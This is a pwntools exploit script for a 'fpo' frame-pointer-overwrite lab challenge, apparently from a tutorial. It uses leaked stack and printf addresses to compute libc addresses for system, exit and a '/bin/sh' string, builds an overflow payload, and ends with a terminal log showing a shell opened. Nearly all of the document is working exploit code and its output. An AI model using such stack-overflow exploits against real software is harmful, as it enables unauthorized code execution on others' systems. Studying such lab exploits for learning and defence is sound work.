from pwn import *

# Lab exploit for the 'fpo' (frame pointer overwrite) challenge binary.
#
# Everything below depends on two values the target prints at runtime: the
# address of its own stack buffer and the address of printf() in libc.  Those
# leaks are what make the hard-coded offsets usable; the payload sent at the
# end is 66 bytes (62 of padding/addresses + one 4-byte word) into what the
# prompt names buf[50].  Remove the leak or the overflow and the script has
# nothing to work with.  Written for Python 2 (print statements, str
# concatenation of recv() results).
p = process(['./fpo','AAAA'])

# Read the 10-character "0x........" token that follows the prompt.
p.recvuntil('buf[50] address : ')
tmp = p.recv(10)
stackAddr = int(tmp,16)
stackAddr += 0x8
# tmp is 10 chars, so [8:11] yields only the last two hex digits (the low
# byte of the leaked address); +4 is then packed as the final payload word.
# The transcript below shows a leak ending in ...3a producing 0x3e.
onebyte = int(tmp[8:11],16)
onebyte += 0x4

# Second leak: printf()'s address.  int() tolerates the trailing newline.
p.recvuntil('Printf() address : ')
libc = p.recvuntil('\n')
libc = int(libc,16)

# Offsets are hard-coded for the author's libc build and are only valid for
# that exact build; the labels come from the print lines below.
libcBase = libc - 0x49020     # printf() offset -> libc base
sysAddr = libcBase + 0x3a940  # system()
exit = libcBase + 0x2e7b0     # exit()  (shadows the builtin name `exit`)
binsh = libcBase + 0x15902b   # "binsh"

print "StackAddr : " + hex(stackAddr)
print "onebyte : " + hex(onebyte)
print "libc base : " + hex(libcBase)
print "system() : " +hex(sysAddr)
print "exit() : " +hex(exit)
print "binsh : " + hex(binsh)

# Payload layout (32-bit little-endian words via p32):
#   [stackAddr+8][system][exit][binsh]  -- what appears to be a
#   system/exit/binsh call frame anchored at the leaked stack address --
#   NOP (0x90) padding up to 62 bytes, then the adjusted low byte as a
#   full 4-byte word.  (62 - len(exploit)) is 46 here; it would go
#   negative only if the four words exceeded 62 bytes.
exploit = p32(stackAddr)
exploit += p32(sysAddr)
exploit += p32(exit)
exploit += p32(binsh)
exploit += '\x90' * (62 - len(exploit))
exploit += p32(onebyte)

p.send(exploit)
p.interactive()
lazenca0x0@ubuntu:~/Exploit/FPO$ python Exploitexploit.py 
[+] Starting local process './fpo': pid 4830
StackAddr : 0xffc98542
onebyte : 0x3e
libc base : 0xf7d8d000
system() : 0xf7dc7940
exit() : 0xf7dbb7b0
binsh : 0xf7ee602b
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$
